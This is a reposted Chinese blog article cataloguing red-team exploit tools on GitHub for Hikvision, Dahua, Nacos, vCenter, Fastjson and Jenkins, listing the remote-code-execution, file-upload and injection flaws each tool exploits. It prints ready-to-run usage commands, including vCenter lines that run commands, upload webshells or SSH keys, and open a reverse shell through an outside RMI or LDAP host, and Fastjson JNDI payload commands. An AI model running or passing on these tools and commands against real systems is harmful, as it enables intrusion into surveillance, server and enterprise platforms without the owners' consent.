红队武器库漏洞利用工具合集整理-附地址

admin 2024年9月25日23:22:57评论39 views字数 6405阅读21分21秒阅读模式

目录

红队武器库漏洞利用工具合集整理

海康威视Hikvision综合漏洞利用工具大华Dahua综合漏洞利用工具Nacos综合漏洞利用工具Vcenter综合漏洞利用工具Fastjson漏洞批量检测工具Jenkins综合漏洞利用工具Struts2全版本漏洞检测工具Thinkphp综合漏洞利用工具Spring综合漏洞利用工具Shiro反序列化漏洞综合利用工具若依RuoYi综合漏洞利用工具Xxl-job漏洞利用工具Jboss综合漏洞利用工具Weblogic综合漏洞利用工具Tomcat综合漏洞利用工具帆软反序列化漏洞利用工具云资产AK-SK利用管理工具Confluence综合漏洞利用工具数据库综合利用工具DecryptTools综合加解密后渗透工具互联网厂商API利用工具OA综合漏洞利用工具信息泄露利用工具 Swagger API信息泄露利用工具 Heapdump敏感信息提取工具 .git泄漏利用工具 SVN源代码利用工具 .DS_Store文件泄露利用工具 .cvs源代码泄露利用工具 Webpack:安全检测的扫描工具

海康威视 Hikvision 综合漏洞利用工具

项目地址

https://github.com/MInggongK/Hikvision-

项目介绍

海康威视综合漏洞利用工具 收录漏洞如下:
Hikvision 摄像头未授权访问漏洞
Hikvision 远程代码执行漏洞
Hikvision iVMS综合安防系统任意文件上传漏洞
Hikvision综合安防管理平台isecure center文件上传漏洞
Hikvision综合安防管理平台config信息泄露漏洞
Hikvision综合安防管理平台env信息泄漏漏洞
Hikvision综合安防管理平台report任意文件上传漏洞
Hikvision综合安防管理平台api session命令执行漏洞
Hikvision applyCT命令执行漏洞
Hikvision applyAutoLoginTicket命令执行漏洞
Hikvision keepAlive远程代码执行漏洞
Hikvision综合安防管理平台orgManage任意文件读取漏洞
Hikvision综合安防管理平台files任意文件读取漏洞

红队武器库漏洞利用工具合集整理-附地址

Dahua 综合漏洞利用工具

项目地址

https://github.com/MInggongK/dahuaExploitGUI

项目介绍

Dhua综合漏洞利用工具 收录漏洞如下:

大华DSS数字监控系统attachment_clearTempFile.action注入漏洞
大华DSS数字监控系统远程命令执行漏洞
大华DSS数字监控系统itcBulletin注入漏洞
大华智慧园区综合管理平台信息泄露漏洞
大华智慧园区综合管理平台getNewStaypointDetailQuery注入漏洞
大华智慧园区综合管理平台clientserver注入
大华DSS user_edit.action信息泄露漏洞
大华智慧园区综合管理平台poi任意文件上传漏洞
大华智慧园区综合管理平台video任意文件上传漏洞
大华智慧园区综合管理平台emap任意文件上传漏洞
大华智慧园区综合管理平台searchJson注入漏洞
大华DSS数字监控系统attachment_getAttList.action注入漏洞
大华智能物联综合管理平台justForTest用户登录漏洞
大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞
大华智慧园区综合管理平台deleteFtp远程命令执行漏洞
大华EIMS-capture_handle远程命令执行漏洞
大华智能物联综合管理平台random远程命令执行漏洞
大华智慧园区综合管理平台ipms命令执行漏洞

红队武器库漏洞利用工具合集整理-附地址

红队武器库漏洞利用工具合集整理-附地址

Nacos 综合漏洞利用工具

项目地址

https://github.com/charonlight/NacosExploitGUI

项目介绍

集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用

红队武器库漏洞利用工具合集整理-附地址

红队武器库漏洞利用工具合集整理-附地址

红队武器库漏洞利用工具合集整理-附地址

红队武器库漏洞利用工具合集整理-附地址

红队武器库漏洞利用工具合集整理-附地址

Vcenter 综合漏洞利用工具

项目地址

https://github.com/Schira4396/VcenterKiller
https://github.com/W01fh4cker/VcenterKit

项目介绍

一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接

go build -o main.exe

./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 //get cookie
./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656
Vcenter综合渗透利用工具包 | Vcenter Comprehensive Penetration and Exploitation Toolkit包含

信息收集模块
CVE-2021-21972模块
CVE-2021-21985模块
CVE-2021-22005模块
CVE-2022-22954模块
CVE-2022-22972模块
后渗透利用模块
渗透测试记事本(打vcenter的时候常用的命令、常看的文章)

红队武器库漏洞利用工具合集整理-附地址

红队武器库漏洞利用工具合集整理-附地址

红队武器库漏洞利用工具合集整理-附地址

Fastjson 漏洞批量检测工具

项目地址

https://github.com/c0ny1/FastjsonExploit
https://github.com/smallfox233/JsonExp

项目介绍

FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:

一键生成利用payload,并启动所有利用环境。
管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)


.---- -. -. . . .
( .',----- - - ' '
_/ ;--:- __--------------------__
__U__n_^_''__[. |ooo___ | |_!_||_!_||_!_||_!_| |
c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
,____________'_|,L______],|______________________|
/;_(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o)

FastjsonExploit is a Fastjson library vulnerability exploit framework
Author:c0ny1<[email protected]>


Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types:
Payload PayloadType VulVersion Dependencies
------- ----------- ---------- ------------
BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4
JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass
JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass
JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass
JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass
JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0
SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE
TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
1. 根据现有payload,检测目标是否存在fastjson或jackson漏洞(工具仅用于检测漏洞、定位payload)
2. 若存在漏洞,可根据对应payload进行后渗透利用
3. 若出现新的漏洞时,可将最新的payload新增至txt中(需修改格式)
4. 工具无法完全替代手工检测,仅作为辅助工具使用
JsonExp.exe -h
usage: -u [目标] -l [LDAP地址]
usage: -uf [url.txt] -l [LDAP地址]
usage: -req [request.txt] -l [LDAP地址]

[-h] [-uf URLFILE] [-u URL] [-req REQUEST] [-to TIMEOUT] [-f FILE] [-t TYPE] [-c COOKIE] [-l LDAP] [-r RMI]
[-pro PROTOCOL] [-proxy PROXY]

功能:批量检测是否存在fastjson/jackson漏洞(未使用-f时,默认检测fastjson)

optional arguments:
-h, --help show this help message and exit
-uf URLFILE, --urlfile URLFILE
[可选] 指定批量目标(文本路径)
-u URL, --url URL [可选] 指定目标
-req REQUEST, --request REQUEST
[可选] 指定请求包,默认为http协议发送请求
-to TIMEOUT, --timeout TIMEOUT
[非必须] 指定请求超时时长,默认为5秒
-f FILE, --file FILE [非必须] 指定payload(文本路径),默认为template/fastjson.txt
-t TYPE, --type TYPE [非必须] 指定请求类型为get或post,默认为post
-c COOKIE, --cookie COOKIE
[非必须] 设置cookie值,默认为空
-l LDAP, --ldap LDAP [可选] 指定ldap地址,ip:端口/路径 或 域名:端口/路径
-r RMI, --rmi RMI [可选] 指定rmi地址,ip:端口 或 域名:端口
-pro PROTOCOL, --protocol PROTOCOL
[可选] 指定请求包的协议类型,需结合-req参数使用,默认为http
-proxy PROXY, --proxy PROXY
[可选] 设置代理,例:--proxy http://127.0.0.1:8080

Jenkins 综合漏洞利用工具

项目地址

https://github.com/TheBeastofwar/JenkinsExploit-GUI

项目介绍

支持检测:
CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1
CVE-2016-0792 Jenkins XStream反序列化远程代码执行 https://github.com/jpiechowka/jenkins-cve-2016-0792
CVE-2017-1000353 Jenkins-CI 远程代码执行漏洞 https://github.com/vulhub/CVE-2017-1000353
CVE-2018-1000600 Jenkins GitHub SSRF+信息泄露
CVE-2018-1000861 Jenkins 绕过Groovy沙盒未授权命令执行漏洞 https://github.com/orangetw/awesome-jenkins-rce-2019
CVE-2018-1999002 Jenkins 任意文件读取 https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w
CVE-2019-1003000 Jenkins 远程代码执行 https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
CVE-2019-1003005/CVE-2019-1003029 远程代码执行(Script Security Plugin沙箱绕过) https://github.com/orangetw/awesome-jenkins-rce-2019
CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897

红队武器库漏洞利用工具合集整理-附地址

这里只列出了部分,具体详情到github去查看,风险自查!

项目地址:https://github.com/onewinner/VulToolsKit

原文始发于微信公众号(哈拉少安全小队):红队武器库漏洞利用工具合集整理-附地址

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月25日23:22:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队武器库漏洞利用工具合集整理-附地址http://cn-sec.com/archives/3125666.html

发表评论

匿名网友 填写信息